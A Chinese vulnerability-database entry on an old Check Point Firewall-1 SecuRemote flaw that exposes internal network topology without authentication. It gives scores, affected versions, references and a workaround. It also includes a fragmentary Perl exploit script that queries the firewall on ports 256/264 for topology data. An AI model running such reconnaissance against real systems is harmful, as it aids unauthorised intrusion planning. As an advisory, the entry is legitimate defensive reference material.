发布时间 :2001-07-18 00:00:00
修订时间 :2008-09-10 15:10:13

[原文]The default configuration of SecuRemote for Check Point Firewall-1 allows remote attackers to obtain sensitive configuration information for the protected network without authentication.

[CNNVD]Check Point Firewall-1 SecureRemote网络信息泄露漏洞(CNNVD-200107-113)

        SecureRemote是Check Point软件设计的一个专利VPN构件,包含在某些版本的Firewall-1中。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:checkpoint:firewall-1:4.1:sp1Checkpoint Firewall-1 1 4.1 SP1
cpe:/a:checkpoint:firewall-1:4.0Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1Checkpoint Firewall-1 4.1
cpe:/a:checkpoint:firewall-1:4.1:sp2Checkpoint Firewall-1 1 4.1 SP2
cpe:/a:checkpoint:firewall-1:4.1:sp4Checkpoint Firewall-1 1 4.1 SP4
cpe:/a:checkpoint:firewall-1:4.1:sp3Checkpoint Firewall-1 1 4.1 SP3

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  fw1-securemote-gain-information(6857)
(UNKNOWN)  BID  3058
(UNKNOWN)  BUGTRAQ  20010718 Firewall-1 Information leak

- 漏洞信息

Check Point Firewall-1 SecureRemote网络信息泄露漏洞
中危 配置错误
2001-07-18 00:00:00 2005-05-02 00:00:00
        SecureRemote是Check Point软件设计的一个专利VPN构件,包含在某些版本的Firewall-1中。

- 公告与补丁

        * 使用策略编辑器,取消"respond to unauthenticated topology requests"选项。
        Check Point Software

- 漏洞信息 (21015)

Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability (EDBID:21015)
hardware remote
2001-07-17 Verified
0 Haroon Meer & Roelof Temmingh
N/A [点击下载]

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# -

use Socket;
if ($#ARGV<0) {die "Usage: IP\n";}

print "Testing $host on port $port\n";

$SENDY = pack("H*",$SENDY);


if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
# Spidermark: sensepostdata fw1

- 漏洞信息

Check Point FireWall-1 SecuRemote Internal Network Information Remote Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Check Point FireWall-1 contains a flaw that may disclose sensitive network topology information to a remote attacker. The issue is due to a flaw in the SecuRemote software which creates sessions between remote users and FW-1 modules. When a remote user connects to the system a network topology is transferred to the client, regardless of authentication.

- 时间线

2001-07-21 Unknow
2001-07-21 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: 1. Set the firewall gateway for VPN, with the "Respond to unauthenticated topology requests" enabled. 2. Set up a sample secuRemote client, and download the site topology. 3. Turn off "Respond to unauthenticated topology requests". 4. Securely distribute the file userc.C from the sample client to all secuRemote users. You will need to send out an updated userc.C any time there is a change to the encryption domain or keying info.

- 相关参考

- 漏洞作者